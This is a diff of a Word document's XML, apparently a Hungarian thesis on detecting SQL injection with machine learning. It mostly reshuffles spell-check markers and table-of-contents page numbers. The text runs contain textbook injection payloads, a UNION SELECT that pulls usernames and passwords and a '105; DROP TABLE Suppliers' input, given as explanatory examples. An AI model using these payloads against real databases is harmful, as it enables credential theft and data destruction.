+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1408,7 +1622,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>/test készlet,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1418,7 +1632,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1428,7 +1642,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1438,8 +1652,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion m</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1448,7 +1663,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1458,8 +1673,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">trix, </w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1468,8 +1684,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1478,7 +1695,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ecal</w:t>
+        <w:t>m</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1488,8 +1705,61 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ecal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>l</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1724,7 +1994,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1798,7 +2068,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1872,7 +2142,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1963,7 +2233,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2055,7 +2325,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2145,7 +2415,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2235,7 +2505,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2326,7 +2596,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2419,7 +2689,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2510,7 +2780,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2603,7 +2873,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2695,7 +2965,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2787,7 +3057,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2879,7 +3149,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2971,7 +3241,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3063,7 +3333,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3156,7 +3426,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3249,7 +3519,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3340,7 +3610,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3431,7 +3701,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3505,7 +3775,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3579,7 +3849,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3653,7 +3923,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>26</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3727,7 +3997,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>27</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4133,7 +4403,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A téma</w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4141,6 +4418,7 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4209,7 +4487,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>The Open Web Application Security Project</w:t>
+        <w:t xml:space="preserve">The Open Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4379,119 +4685,52 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>' UNION SELECT username, password FROM user</w:t>
-      </w:r>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">-- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">megadása </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a bemenet sérülékeny</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">létezik </w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tábla, valamint </w:t>
-      </w:r>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> oszlop:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>user</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4499,8 +4738,263 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
-      </w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadása </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a bemenet sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">létezik </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tábla, valamint </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlop:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gifts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4638,18 +5132,33 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
+        <w:t>(in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>classic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4929,46 +5438,48 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>105; DROP TABLE Suppliers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">tényleges </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lekérdezés </w:t>
-      </w:r>
+        <w:t xml:space="preserve">105; DROP TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT</w:t>
+        <w:t>Suppliers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tényleges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lekérdezés </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4976,7 +5487,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>SELECT</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4984,7 +5495,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>*</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4992,7 +5503,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5000,7 +5511,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>FROM</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5008,7 +5519,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>FROM</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5016,23 +5527,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>WHERE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5040,7 +5553,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>WHERE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5048,23 +5561,25 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UserId</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>UserId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5072,7 +5587,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5080,7 +5595,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>105;</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5088,7 +5603,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>105;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5096,7 +5611,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>DROP</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5104,7 +5619,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>DROP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5112,7 +5627,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TABLE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5120,7 +5635,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>TABLE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5128,15 +5643,16 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Su</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
+        <w:t>Su</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5144,8 +5660,17 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -5253,7 +5778,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (error-based)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
